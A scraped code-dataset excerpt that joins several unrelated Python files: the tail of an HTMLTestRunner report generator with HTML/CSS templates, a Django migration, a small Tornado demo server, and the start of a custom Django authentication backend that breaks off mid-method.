DrawLine(ctx,(y[i]+x[i])/2,153,(y[i]+x[i])/2,158,color[i]);
DrawString(ctx, data[i], '', color[i], '', '', (y[i]+x[i])/2, h[i]-15);
if(i < 2) {
DrawLine(ctx,(y[i]+x[i])/2,h[i],(y[i+1]+x[i+1])/2,h[i+1],'black');
}
}
}
</script>
"""
# variables: (title, generator, stylesheet, heading, report, ending)
# ------------------------------------------------------------------------
# Stylesheet
#
# alternatively use a <link> for external style sheet, e.g.
# <link rel="stylesheet" href="$url" type="text/css">
STYLESHEET_TMPL = """
<style type="text/css" media="screen">
body { font-family: verdana, arial, helvetica, sans-serif; font-size: 80%; }
table { font-size: 100%; }
pre { }
/* -- heading ---------------------------------------------------------------------- */
h1 {
font-size: 16pt;
color: gray;
}
.heading {
margin-top: 0ex;
margin-bottom: 1ex;
}
.heading .attribute {
margin-top: 1ex;
margin-bottom: 0;
}
.button{
border:1px solid #cccccc;
cursor:pointer;
margin:10px 5px;
height:40px;
text-align:center;
border-radius: 4px;
border-color: #636263 #464647 #A1A3A5;
text-shadow: 0 1px 1px #F6F6F6;
background-image: -moz-linear-gradient(center top, #D9D9D9, #A6A6A6 49%, #A6A6A6 50%);
background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0, #D9D9D9),color-stop(1, #A6A6A6));
}
.buttonText{
position:relative;
font-weight:bold;
top:10px;
color:#58595B;
}
.heading .description {
margin-top: 4ex;
margin-bottom: 6ex;
}
.panel .description{
border:1px solid #CCCCCC;
border-color: #636263 #464647 #A1A3A5;
margin:10px 5px;
height:165px;
border-radius: 4px;
}
.scroll-item {
position: relative;
width: 100%;
height: 32px;
border-bottom:1px solid gray;
cursor: pointer;
}
.item-even {
background-color: #E7E8EC;
}
.item-odd {
background-color: #E0ECF6;
}
.rect {
float: left;
margin-top: 5px;
margin-left: 5px;
width: 20px;
height: 20px;
border-radius: 3px;
}
.item-text{
margin-left: 5px;
height: 100%;
float: left;
font-size: 14px;
vertical-align: middle;
display: inline-block;
line-height: 30px;
}
.bg{
position:absolute;
height:97%;
width:80%;
overflow-x: hidden;
overflow-y:hidden;
}
.panel{
position:absolute;
height:550px;
width:750px;
left:45px;
top:45px;
border-radius: 12px;
background-image: -moz-linear-gradient(top,#EBEBEB, #BFBFBF);
background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0, #EBEBEB),color-stop(1, #BFBFBF));
}
.panel1{
position:absolute;
height:550px;
width:200px;
left:800px;
top:45px;
border-radius: 12px;
background-image: -moz-linear-gradient(top,#EBEBEB, #BFBFBF);
background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0, #EBEBEB),color-stop(1, #BFBFBF));
}
.panelBg{
position:absolute;
height:600px;
width:1000px;
left:20px;
top:20px;
border-radius: 12px;
background-color:#000000;
opacity:0.5;
}
.title{
border:1px solid green;
position:relative;
margin:5px;
font-size:22px;
font-weight:bold;
text-align:center;
color:#58595B;
}
.piechart{
border:1px solid green;
margin:5px;
height:170px;
}
.barchart{
border:1px solid green;
margin:5px;
height:170px;
}
.linechart{
border:1px solid green;
margin:5px;
height:170px;
}
.subTitle{
border:1px solid green;
margin:5px;
font-size:14px;
height:70px;
font-weight:bold;
text-indent:2em;
color:#6D6E71;
}
/* -- css div popup ------------------------------------------------------------------------ */
a.popup_link {
}
a.popup_link:hover {
color: red;
}
.popup_window {
display: none;
position: relative;
left: 0px;
top: 0px;
/*border: solid #627173 1px; */
padding: 10px;
background-color: #E6E6D6;
font-family: "Lucida Console", "Courier New", Courier, monospace;
text-align: left;
font-size: 8pt;
width: 500px;
}
}
/* -- report ------------------------------------------------------------------------ */
#show_detail_line {
margin-top: 3ex;
margin-bottom: 1ex;
}
#result_table {
width: 80%;
border-collapse: collapse;
border: 1px solid #777;
}
#header_row {
font-weight: bold;
color: white;
background-color: #777;
}
#result_table td {
border: 2px solid #777;
padding: 3px;
}
#total_row { font-weight: bold; }
.passClass { background-color: #6c6; }
.failClass { background-color: #c60; }
.errorClass { background-color: #c00; }
.passCase { color: #58595B; font-weight: bold;}
.failCase { color: #c60; font-weight: bold; }
.errorCase { color: #c00; font-weight: bold; }
.hiddenRow { display: none; }
.testcase { margin-left: 2em; }
#section1{
border:1px solid green;
position:relative;
float:left;
width:235px;
height:530px;
top:10px;
left:10px;
}
#section2{
border:1px solid green;
position:relative;
float:left;
width:235px;
height:530px;
top:10px;
left:20px;
}
#section3{
border:1px solid green;
position:relative;
float:left;
width:235px;
height:530px;
top:10px;
left:30px;
}
#section4{
border:1px solid green;
position:relative;
float:left;
width:180px;
height:530px;
top:10px;
left:10px;
}
.loseeffect{
color:black;
text-decoration:none;
cursor:text;
}
/* -- ending ---------------------------------------------------------------------- */
#ending {
}
</style>
"""
# ------------------------------------------------------------------------
# Heading
#
HEADING_TMPL = """<div class='heading'>
<h1>%(title)s</h1>
%(parameters)s
<p class='description'>%(description)s</p>
</div>
""" # variables: (title, parameters, description)
HEADING_ATTRIBUTE_TMPL = """<p class='attribute'><strong>%(name)s:</strong> %(value)s</p>
""" # variables: (name, value)
# ------------------------------------------------------------------------
# Report
#
REPORT_TMPL = """
<p id='show_detail_line'>Show
<a href='javascript:showCase(0)'>Summary</a>
<a href='javascript:showCase(1)'>Pass</a>
<a href='javascript:showCase(2)'>Fail</a>
<a href='javascript:showCase(3)'>Error</a>
<a href='javascript:showCase(5)'>Fail&Error</a>
<a href='javascript:showCase(4)'>All</a>
</p>
<table id='result_table'>
<colgroup>
<col align='left' />
<col align='right' />
<col align='right' />
<col align='right' />
<col align='right' />
<col align='right' />
</colgroup>
<tr id='header_row'>
<td>Test Group/Test case</td>
<td>Count</td>
<td>Pass</td>
<td>Fail</td>
<td>Error</td>
<td>CaseShot</td>
<td>CaseInfo</td>
</tr>
%(test_list)s
<tr id='total_row'>
<td>Total and Rate</td>
<td>%(count)s</td>
<td>%(Pass)s</td>
<td>%(fail)s</td>
<td>%(error)s</td>
<td>Proportion</td>
<td>%(Pass)s/%(count)s</td>
</tr>
</table>
""" # variables: (test_list, count, Pass, fail, error)
REPORT_CLASS_TMPL = r"""
<tr class='%(style)s'>
<td>%(desc)s</td>
<td>%(count)s</td>
<td>%(Pass)s</td>
<td>%(fail)s</td>
<td>%(error)s</td>
<td>Click hyperlink view</td>
<td><a href="javascript:showClassDetail('%(cid)s',%(count)s)">Detail</a></td>
</tr>
""" # variables: (style, desc, count, Pass, fail, error, cid)
REPORT_TEST_WITH_OUTPUT_TMPL = r"""
<tr id='%(tid)s' class='%(Class)s'>
<td class='%(style)s'><div class='testcase'>%(desc)s</div></td>
<td colspan='4' align='center'>
<!--css div popup start-->
<a class="popup_link" onfocus='this.blur();' href="javascript:showTestDetail('div_%(tid)s')" >
%(status)s</a>
<div id='div_%(tid)s' class="popup_window">
<div style='text-align: right; color:red;cursor:pointer'>
<a onfocus='this.blur();' onclick="document.getElementById('div_%(tid)s').style.display = 'none' " >
[x]</a>
</div>
<pre>
%(script_out)s
</pre>
</div>
<!--css div popup end-->
</td>
<td colspan='1' align='center'><a %(hidde)s href="%(image_url)s" class="%(loseeffect)s">picture_shot</a>
</td>
<td colspan='1' align='center'>%(script_info)s</td>
</tr>
""" # variables: (tid, Class, style, desc, status)
REPORT_TEST_NO_OUTPUT_TMPL = r"""
<tr id='%(tid)s' class='%(Class)s'>
<td class='%(style)s'><div class='testcase'>%(desc)s</div></td>
<td colspan='4' align='center'>
<a class="popup_link" onfocus='this.blur();' href="javascript:showTestDetail('div_%(tid)s')" >
%(status)s</a>
<div id='div_%(tid)s' class="popup_window">
<div style='text-align: right; color:red;cursor:pointer'>
<a onfocus='this.blur();' onclick="document.getElementById('div_%(tid)s').style.display = 'none' " >
[x]</a>
</div>
<pre>
%(script_out)s
</pre>
</div>
</td>
<td colspan='1' align='center'><a %(hidde)s href="%(image_url)s" class="%(loseeffect)s">picture_shot</a>
</td>
<td colspan='1' align='center'>%(script_info)s</td>
</tr>
""" # variables: (tid, Class, style, desc, status)
REPORT_TEST_OUTPUT_TMPL = r"""
%(id)s: %(output)s
""" # variables: (id, output)
CASEINFO_OUTPUT_TMPL = r"""
%(caseinfo)s
""" # variables: (caseinfo)
# ------------------------------------------------------------------------
# ENDING
#
ENDING_TMPL = """<div id='ending'> </div>"""
CHART_TMPL = """<div class="bg">
<div class="panelBg"></div>
<div class="panel">
<div id="section1">
<div class="title">测试饼图</div>
<div class="subTitle">This chart is to show the rate that statis of test cases</div>
<div class="piechart">
<canvas id="circle" width="225" height="168" onmousemove='javascript:drawCircle(%(Pass)s, %(fail)s, %(error)s)'>your browser does not support the canvas tag</canvas>
</div>
<div class="description">
<div class="scroll-item item-even">
<div class="rect" style="background-color: #6c6; "></div>
<div class="item-text">Passcase:%(Pass)s</div>
</div>
<div class="scroll-item item-odd">
<div class="rect" style="background-color: #c60; "></div>
<div class="item-text">failcase:%(fail)s</div>
</div>
<div class="scroll-item item-even">
<div class="rect" style="background-color: #c00; "></div>
<div class="item-text">errorcase:%(error)s</div>
</div>
<div class="scroll-item item-odd">
</div>
<div class="scroll-item item-even">
</div>
</div>
<div class="button" onclick='javascript:drawCircle(%(Pass)s, %(fail)s, %(error)s)'><span class="buttonText">CLICK SEE PIE CHART</span></div>
</div>
<div id="section2">
<div class="title">测试柱状图</div>
<div class="subTitle">This chart is to show the count that statis of test cases</div>
<div class="barchart">
<canvas id="bar" width="225" height="168" onclick='javascript:drawBar(%(Pass)s, %(fail)s, %(error)s)'>your browser does not support the canvas tag</canvas>
</div>
<div class="description">
<div class="scroll-item item-even">
<div class="rect" style="background-color: #6c6; "></div>
<div class="item-text">Passcase:%(Pass)s</div>
</div>
<div class="scroll-item item-odd">
<div class="rect" style="background-color: #c60; "></div>
<div class="item-text">failcase:%(fail)s</div>
</div>
<div class="scroll-item item-even">
<div class="rect" style="background-color: #c00; "></div>
<div class="item-text">errorcase:%(error)s</div>
</div>
<div class="scroll-item item-odd">
</div>
<div class="scroll-item item-even">
</div>
</div>
<div class="button" onclick='javascript:drawBar(%(Pass)s, %(fail)s, %(error)s)'><span class="buttonText">CLICK SEE BAR CHART</span></div>
</div>
<div id="section3">
<div class="title">测试分析线形图</div>
<div class="subTitle">This chart is to show the rate that data of test cases</div>
<div class="linechart">
<canvas id="line" width="225" height="168" onclick='javascript:drawline(%(Pass)s, %(fail)s, %(error)s)'>your browser does not support the canvas tag</canvas>
</div>
<div class="description">
<div class="scroll-item item-even">
<div class="rect" style="background-color: #6c6; "></div>
<div class="item-text">Passcase:%(Pass)s</div>
</div>
<div class="scroll-item item-odd">
<div class="rect" style="background-color: #c60; "></div>
<div class="item-text">failcase:%(fail)s</div>
</div>
<div class="scroll-item item-even">
<div class="rect" style="background-color: #c00; "></div>
<div class="item-text">errorcase:%(error)s</div>
</div>
<div class="scroll-item item-odd">
</div>
<div class="scroll-item item-even">
</div>
</div>
<div class="button" onclick='javascript:drawline(%(Pass)s, %(fail)s, %(error)s)'><span class="buttonText">CLICK SEE BAR CHART</span></div>
</div>
</div>
<div class="panel1">
<div id="section4">
<a>%(Pass)s Pass cases, %(fail)s fail cases, %(error)s error cases.</a>
</div>
</div>
</div>"""
# -------------------- The end of the Template class -------------------
# Alias kept for brevity; _TestResult extends the stdlib result class.
TestResult = unittest.TestResult
class _TestResult(TestResult):
    # note: _TestResult is a pure representation of results.
    # It lacks the output and reporting ability compares to unittest._TextTestResult.
    #
    # While a test runs, sys.stdout/sys.stderr are swapped for the module-level
    # stdout_redirector/stderr_redirector objects (defined elsewhere in this
    # file), which both write into a per-test StringIO buffer.
    def __init__(self, verbosity=1):
        TestResult.__init__(self)
        # Saved original streams; None means "not currently redirected".
        self.stdout0 = None
        self.stderr0 = None
        self.success_count = 0
        self.failure_count = 0
        self.error_count = 0
        self.verbosity = verbosity
        # result is a list of result in 4 tuple
        # (
        #   result code (0: success; 1: fail; 2: error),
        #   TestCase object,
        #   Test output (byte string),
        #   stack trace,
        # )
        self.result = []
    def startTest(self, test):
        """Begin a test: start capturing everything written to stdout/stderr."""
        TestResult.startTest(self, test)
        # just one buffer for both stdout and stderr
        self.outputBuffer = io.StringIO()
        stdout_redirector.fp = self.outputBuffer
        stderr_redirector.fp = self.outputBuffer
        self.stdout0 = sys.stdout
        self.stderr0 = sys.stderr
        sys.stdout = stdout_redirector
        sys.stderr = stderr_redirector
    def complete_output(self):
        """
        Disconnect output redirection and return buffer.
        Safe to call multiple times.
        """
        if self.stdout0:
            sys.stdout = self.stdout0
            sys.stderr = self.stderr0
            self.stdout0 = None
            self.stderr0 = None
        return self.outputBuffer.getvalue()
    def stopTest(self, test):
        # Usually one of addSuccess, addError or addFailure would have been called.
        # But there are some path in unittest that would bypass this.
        # We must disconnect stdout in stopTest(), which is guaranteed to be called.
        self.complete_output()
    def addSuccess(self, test):
        """Record a pass: code 0, captured output, no traceback text."""
        self.success_count += 1
        TestResult.addSuccess(self, test)
        output = self.complete_output()
        self.result.append((0, test, output, ''))
        # Progress indicator goes to the real stderr (redirection is off now).
        if self.verbosity > 1:
            sys.stderr.write('ok ')
            sys.stderr.write(str(test))
            sys.stderr.write('\n')
        else:
            sys.stderr.write('.')
    def addError(self, test, err):
        """Record an error: code 2, plus the formatted traceback from unittest."""
        self.error_count += 1
        TestResult.addError(self, test, err)
        # unittest appends (test, formatted_traceback) to self.errors.
        _, _exc_str = self.errors[-1]
        output = self.complete_output()
        self.result.append((2, test, output, _exc_str))
        if self.verbosity > 1:
            sys.stderr.write('E  ')
            sys.stderr.write(str(test))
            sys.stderr.write('\n')
        else:
            sys.stderr.write('E')
    def addFailure(self, test, err):
        """Record an assertion failure: code 1, plus the formatted traceback."""
        self.failure_count += 1
        TestResult.addFailure(self, test, err)
        _, _exc_str = self.failures[-1]
        output = self.complete_output()
        self.result.append((1, test, output, _exc_str))
        if self.verbosity > 1:
            sys.stderr.write('F  ')
            sys.stderr.write(str(test))
            sys.stderr.write('\n')
        else:
            sys.stderr.write('F')
class HTMLTestRunner(Template_mixin):
    """Test runner that renders results as an HTML report.

    Fills the string templates provided by Template_mixin (HTML_TMPL,
    REPORT_TMPL, CHART_TMPL, ...) and writes the encoded page to `stream`.
    """
    def __init__(self, test_name,stream=sys.stdout, verbosity=1, title=None, description=None,):
        # test_name: list of human-readable case names, consumed positionally
        # in _generate_report (one entry per rendered test row).
        self.stream = stream
        self.test_name = test_name
        self.verbosity = verbosity
        if title is None:
            self.title = self.DEFAULT_TITLE
        else:
            self.title = title
        if description is None:
            self.description = self.DEFAULT_DESCRIPTION
        else:
            self.description = description
        self.startTime = datetime.datetime.now()
    def run(self, test, caseinfo={}):
        # NOTE(review): mutable default `caseinfo={}` — only ever read
        # (caseinfo.get below), never mutated, so it is harmless here.
        super(HTMLTestRunner,self).__init__()
        "Run the given test case or test suite."
        result = _TestResult(self.verbosity)
        test(result)
        # print(test(result))
        self.stopTime = datetime.datetime.now()
        self.generateReport(test, result, caseinfo)
        # print (sys.stderr, '\nTime Elapsed: %s' % (self.stopTime-self.startTime))
        return result
    def sortResult(self, result_list):
        # unittest does not seems to run in any particular order.
        # Here at least we want to group them together by class.
        rmap = {}
        classes = []
        for n,t,o,e in result_list:
            cls = t.__class__
            if not cls in rmap:
                rmap[cls] = []
                classes.append(cls)
            rmap[cls].append((n,t,o,e))
        # Preserves first-seen class order.
        r = [(cls, rmap[cls]) for cls in classes]
        return r
    def getReportAttributes(self, result):
        """
        Return report attributes as a list of (name, value).
        Override this to add custom attributes.
        """
        startTime = str(self.startTime)[:19]
        duration = str(self.stopTime - self.startTime)
        status = []
        if result.success_count: status.append('Pass %s'    % result.success_count)
        if result.failure_count: status.append('Failure %s' % result.failure_count)
        if result.error_count:   status.append('Error %s'   % result.error_count  )
        if status:
            status = ' '.join(status)
        else:
            status = 'none'
        return [
            ('Start Time', startTime),
            ('Duration', duration),
            ('Status', status),
        ]
    def generateReport(self, test, result, caseinfo):
        """Assemble all template sections and write the encoded HTML page."""
        report_attrs = self.getReportAttributes(result)
        generator = 'HTMLTestRunner %s' % __version__
        stylesheet = self._generate_stylesheet()
        heading = self._generate_heading(report_attrs)
        report = self._generate_report(result, caseinfo)
        ending = self._generate_ending()
        chart = self._generate_chart(result)
        output = self.HTML_TMPL % dict(
            title = saxutils.escape(self.title),
            generator = generator,
            stylesheet = stylesheet,
            heading = heading,
            report = report,
            ending = ending,
            chart = chart,
        )
        # NOTE(review): writes bytes — `stream` must be a binary stream.
        self.stream.write(output.encode('utf8'))
    def _generate_stylesheet(self):
        return self.STYLESHEET_TMPL
    def _generate_heading(self, report_attrs):
        # One HEADING_ATTRIBUTE_TMPL line per (name, value) pair.
        a_lines = []
        for name, value in report_attrs:
            line = self.HEADING_ATTRIBUTE_TMPL % dict(
                    name = saxutils.escape(name),
                    value = saxutils.escape(value),
                )
            a_lines.append(line)
        heading = self.HEADING_TMPL % dict(
            title = saxutils.escape(self.title),
            parameters = ''.join(a_lines),
            description = saxutils.escape(self.description),
        )
        return heading
    def _generate_report(self, result, caseinfo):
        """Render one class summary row plus per-test rows for each class."""
        rows = []
        s= 0
        sortedResult = self.sortResult(result.result)
        for cid, (cls, cls_results) in enumerate(sortedResult):
            # subtotal for a class
            np = nf = ne = 0
            for n,t,o,e in cls_results:
                if n == 0: np += 1
                elif n == 1: nf += 1
                elif n == 2: ne += 1
            # format class description
            if cls.__module__ == "__main__":
                name = cls.__name__
            else:
                name = "%s.%s" % (cls.__module__, cls.__name__)
            doc = cls.__doc__ and cls.__doc__.split("\n")[0] or ""
            desc = doc and '%s: %s' % (name, doc) or name
            # NOTE(review): `s` is incremented but never used afterwards.
            s += 1
            row = self.REPORT_CLASS_TMPL % dict(
                style = ne > 0 and 'errorClass' or nf > 0 and 'failClass' or 'passClass',
                desc = desc,
                count = np+nf+ne,
                Pass = np,
                fail = nf,
                error = ne,
                cid = 'c%s' % (cid+1),
            )
            rows.append(row)
            i = 0
            # print(cls_results)
            # Stops after len(self.test_name) rows: each rendered row consumes
            # one display name from the test_name list passed to __init__.
            for tid, (n,t,o,e) in enumerate(cls_results):
                if len(self.test_name) == i:
                    break
                self._generate_report_test(rows, cid, tid, n, t, o, e, caseinfo,case_name=self.test_name[i])
                i += 1
        report = self.REPORT_TMPL % dict(
            test_list = ''.join(rows),
            count = str(result.success_count+result.failure_count+result.error_count),
            Pass = str(result.success_count),
            fail = str(result.failure_count),
            error = str(result.error_count),
        )
        return report
    def _generate_report_test(self, rows, cid, tid, n, t, o, e, caseinfo,case_name=''):
        # e.g. 'Pt1.1', 'Ft1.1','E1.1,' etc
        has_output = bool(o or e)
        if n == 0:
            tid = 'Pt%s.%s' % (cid+1,tid+1)
        elif n == 1:
            tid = 'Ft%s.%s' % (cid+1,tid+1)
        else:
            tid = 'Et%s.%s' % (cid+1,tid+1)
        name = t.id().split('.')[-1]
        doc = t.shortDescription() or ""
        # desc = doc and ('%s: %s' % (name, doc)) or name
        desc = '用例名称:'+ case_name
        tmpl = has_output and self.REPORT_TEST_WITH_OUTPUT_TMPL or self.REPORT_TEST_NO_OUTPUT_TMPL
        # o and e should be byte string because they are collected from stdout and stderr?
        if isinstance(o,str):
            # TODO: some problem with 'string_escape': it escape \n and mess up formating
            # uo = unicode(o.encode('string_escape'))
            # NOTE(review): assigns `e` (traceback) here, not `o` (output) —
            # looks like a bug; confirm whether `uo = o` was intended.
            uo = e
        else:
            uo = o
        if isinstance(e,str):
            # TODO: some problem with 'string_escape': it escape \n and mess up formating
            # ue = unicode(e.encode('string_escape'))
            ue = e
        else:
            ue = e
        output = saxutils.escape(uo+ue)
        # print (output)
        # If the captured output mentions a screenshot, link the image file
        # (25 chars after the 'screenshot' marker, spaces stripped).
        unum = str(output).find('screenshot')
        # print (unum)
        if (unum!=-1):
            hidde_status = ''
            unum=str(output).find('screenshot')
            image_url = '../screenshot/'+str(output)[unum+11:unum+36].replace(' ','')
            loseeffect = ''
        else:
            hidde_status = ''
            image_url = 'javascript:void(0)'
            loseeffect = 'loseeffect'
        script_out = self.REPORT_TEST_OUTPUT_TMPL % dict(
            id = tid,
            output = saxutils.escape(uo+ue),
        )
        script_info = self.CASEINFO_OUTPUT_TMPL % dict(
            caseinfo = caseinfo.get(desc,'No Case Detail'),
        )
        row = tmpl % dict(
            tid = tid,
            Class = (n == 0 and 'hiddenRow' or 'none'),
            style = (n == 2 and 'errorCase') or (n == 1 and 'failCase') or (n == 0 and 'passCase'),
            desc = desc,
            status = self.STATUS[n],
            script_out = script_out,
            script_info = script_info,
            image_url = image_url,
            hidde = hidde_status,
            loseeffect = loseeffect,
        )
        rows.append(row)
        if not has_output:
            return
    def _generate_ending(self):
        return self.ENDING_TMPL
    def _generate_chart(self, result):
        # Pass/fail/error counts feed the pie/bar/line chart JS in CHART_TMPL.
        report = self.CHART_TMPL % dict(
            Pass = str(result.success_count),
            fail = str(result.failure_count),
            error = str(result.error_count),
        )
        return report
##############################################################################
# Facilities for running tests from the command line
##############################################################################
# Note: Reuse unittest.TestProgram to launch test. In the future we may
# build our own launcher to support more specific command line
# parameters like test title, CSS, etc.
class TestProgram(unittest.TestProgram):
    """
    A variation of the unittest.TestProgram. Please refer to the base
    class for command line parameters.
    """
    def runTests(self):
        # Pick HTMLTestRunner as the default test runner.
        # base class's testRunner parameter is not useful because it means
        # we have to instantiate HTMLTestRunner before we know self.verbosity.
        if self.testRunner is None:
            # FIX: HTMLTestRunner.__init__ requires the positional `test_name`
            # argument (a list of display names); omitting it raised TypeError
            # on this default path. An empty list produces a report with the
            # class summary rows only, which is a working default.
            self.testRunner = HTMLTestRunner(test_name=[], verbosity=self.verbosity)
        unittest.TestProgram.runTests(self)
main = TestProgram
##############################################################################
# Executing this module from the command line
##############################################################################
if __name__ == "__main__":
main(module=None) | [
"yubei874721995@163.com"
] | yubei874721995@163.com |
aa3ef4db85fa713e0d251d91dd3b3f9531a3aae6 | 022d9bb131d5005a262b164bbc10dc0946f6cd3d | /com/migrations/0011_auto_20161130_1850.py | ca79ffb58b8a6b1da97af1b6451292cc57a197dd | [] | no_license | zoucongchao/python-django-community-web- | 1a4a6ece3f239e0caad0c5ed27c3b5aba6876fbc | d4cc1f36d1da8ff11ce464c156b0d7dd91bdfc6c | refs/heads/master | 2020-04-29T16:52:09.585386 | 2017-03-03T06:26:46 | 2017-03-03T06:26:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,387 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-11-30 10:50
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated schema migration (Django 1.10): introduces the Keep
    # (bookmark) model and retargets UserProfile's old "collected" fields.
    dependencies = [
        ('com', '0010_userprofile_collected_num'),
    ]
    operations = [
        # New Keep model: links a user to a question, timestamped on create.
        migrations.CreateModel(
            name='Keep',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_on', models.DateTimeField(auto_now_add=True)),
                ('question', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='com.Question')),
                ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # collected_num -> keep_num (data-preserving rename).
        migrations.RenameField(
            model_name='userprofile',
            old_name='collected_num',
            new_name='keep_num',
        ),
        # Old 'collected' FK is replaced by the new 'keep' FK below.
        migrations.RemoveField(
            model_name='userprofile',
            name='collected',
        ),
        migrations.AddField(
            model_name='userprofile',
            name='keep',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='com.Keep'),
        ),
    ]
| [
"964333698@qq.com"
] | 964333698@qq.com |
b2d861725cf2e826e44c3c5894bafdcdc3b2cdae | 40f61f3e48fa3d433d1b74678b903aad2ba60e20 | /hellojerry.py | 514fcc6921f2a79692bf2c41944e2c4befc8dbe6 | [] | no_license | dian5wenjie/Jerry | e4a122f345834953d99702fd2fe6296d1637fc99 | b587d4414f4061bbfd1019d7c407ff495e04406a | refs/heads/master | 2016-09-06T07:46:36.923474 | 2013-03-17T11:14:58 | 2013-03-17T11:14:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,992 | py | #coding=utf8
#!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import tornado.httpserver
import tornado.ioloop
import tornado.options
import tornado.web
from tornado.options import define, options
# Tornado command-line option: --port selects the HTTP listen port (default 8888).
define("port", default=8888, help="run on the given port", type=int)
class MainHandler(tornado.web.RequestHandler):
    """Root handler: greets visitors, or returns a fixed sample comment as JSON
    when the "jerry" query argument is supplied."""
    def get(self):
        # Canned payload returned for ?jerry=<anything>.
        sample_comment = {
            "id": 1,
            "user": "qiu",
            "team": "jerry",
            "content": "only Test"
        }
        if self.get_argument("jerry", ""):
            self.write(tornado.escape.json_encode(sample_comment))
        else:
            self.write("Welcome to Jerry!\n")
            self.write("欢迎来到Jerry!")
class JerryHandler(tornado.web.RequestHandler):
    """Handler for /jerry: greets by default, or echoes a canned user record
    as JSON when an ``id`` query argument is given."""
    def get(self):
        name = self.get_argument("id", "")
        user = {}
        if not name :
            self.write("Hello jerry!\n")
            self.write("你好Jerry!")
        else :
            # FIX: was a Python-2-only `print` statement; the parenthesized
            # single-argument form behaves identically on both Python 2 and 3.
            print("id : %s" % (name))
            user[name] = "Jerry路虎"
            self.write(tornado.escape.json_encode(user))
def main():
    """Parse command-line options, wire up the routes, and serve forever."""
    tornado.options.parse_command_line()
    app = tornado.web.Application([
        (r"/", MainHandler),
        (r"/jerry", JerryHandler),
    ])
    server = tornado.httpserver.HTTPServer(app)
    server.listen(options.port)
    tornado.ioloop.IOLoop.instance().start()
| [
"cuiqiu.bupt@gmail.com"
] | cuiqiu.bupt@gmail.com |
a38b568d0c7e11c9ab268ee40328f38346010772 | 845c3319cdbf5d3a27a65c55e37a654045ece8e5 | /custom_django_auth_backend/backend.py | 9b8e22712a3c3f7e914f55e3f088b7496692c2f9 | [
"MIT"
] | permissive | Chiorufarewerin/custom-django-auth-backend | 5dc116f05e4682ac73897012ee3a96fc609b1fad | 89aa2330933472f8cfb13ad3c488d4347b6db128 | refs/heads/master | 2021-05-17T16:36:53.342928 | 2020-04-23T09:38:31 | 2020-04-23T09:38:31 | 250,875,466 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,409 | py | from typing import Optional, Type
from django.forms import ValidationError
from .dto import UserDTO
from .exceptions import UnavailbleException, AuthException, WrongUserPasswordException, BlockedUserException
from .settings import DEFAULT_USERNAME_PREFIX
from .logging import logger
class BasicAuthBackend:
    """Django auth backend that delegates credential checks to an external
    service (``get_user_by_login``) and mirrors the result into the local
    prefixed ``User`` rows.

    Subclasses implement :meth:`get_user_by_login`; everything else handles
    mirroring, local password fallback, and blocked-user cleanup.
    """
    # Whether to keep a local copy of user passwords so that logins can still
    # be validated when the external service is unavailable.
    STORE_PASSWORDS = True
    USERNAME_PREFIX = DEFAULT_USERNAME_PREFIX
    def get_user_by_login(self, username: str, password: str) -> UserDTO:
        """Fetch/validate the user against the external service.

        Must be implemented by subclasses; raises the exceptions from
        ``.exceptions`` to signal the various failure modes.
        """
        raise NotImplementedError
    def get_user_model(self) -> Type:
        """Return the Django ``User`` model, logging import failures."""
        try:
            from django.contrib.auth.models import User
            return User
        except Exception:
            logger.exception('Не удалось импортировать модель User')
            raise
    def get_user(self, user_id: int):
        """Return the user with ``user_id`` or None (Django backend API)."""
        # FIX: dropped the redundant `or None` — QuerySet.first() already
        # returns None when no row matches.
        return self.get_user_model().objects.filter(pk=user_id).first()
    def get_prefixed_username(self, username: str) -> str:
        """Namespace external usernames so they can't clash with local ones."""
        return f'{self.USERNAME_PREFIX}{username}'
    def get_user_by_login_exists(self, username: str, password: str):
        """Fallback check against the locally stored password copy.

        Used when the external service is unavailable; returns the user on a
        password match, otherwise None.
        """
        if not self.STORE_PASSWORDS:
            return None
        user = self.get_user_model().objects.filter(username=self.get_prefixed_username(username)).first()
        if not user:
            return None
        if user.check_password(password):
            return user
        return None
    def get_and_update_user(self, username: str, password: str, user_dto: UserDTO):
        """Create or refresh the mirrored local user from the service DTO."""
        user, _ = self.get_user_model().objects.update_or_create(username=self.get_prefixed_username(username),
                                                                 defaults=user_dto.params)
        if not self.STORE_PASSWORDS:
            return user
        # Keep the local password copy in sync for the offline fallback path.
        if not user.check_password(password):
            user.set_password(password)
            user.save()
        return user
    def delete_password_user_if_exists(self, username: str):
        """Invalidate the stored local password copy for ``username``."""
        self.get_user_model().objects.filter(
            username=self.get_prefixed_username(username)
        ).update(password='')
    def set_inactive_user_if_exists(self, username: str):
        """Mark the mirrored local user inactive (blocked upstream)."""
        self.get_user_model().objects.filter(
            username=self.get_prefixed_username(username)
        ).update(is_active=False)
    def authenticate(self, request, username: str, password: str) -> Optional['User']:
        """Django backend entry point.

        Maps service exceptions to backend behavior: unavailable -> local
        fallback; wrong password -> drop local copy; blocked -> deactivate and
        surface a ValidationError; anything else -> None (auth failure).
        """
        if username is None or password is None:
            return None
        try:
            user_dto = self.get_user_by_login(username, password)
        except UnavailbleException:
            return self.get_user_by_login_exists(username, password)
        except WrongUserPasswordException:
            self.delete_password_user_if_exists(username)
            return None
        except BlockedUserException as e:
            self.delete_password_user_if_exists(username)
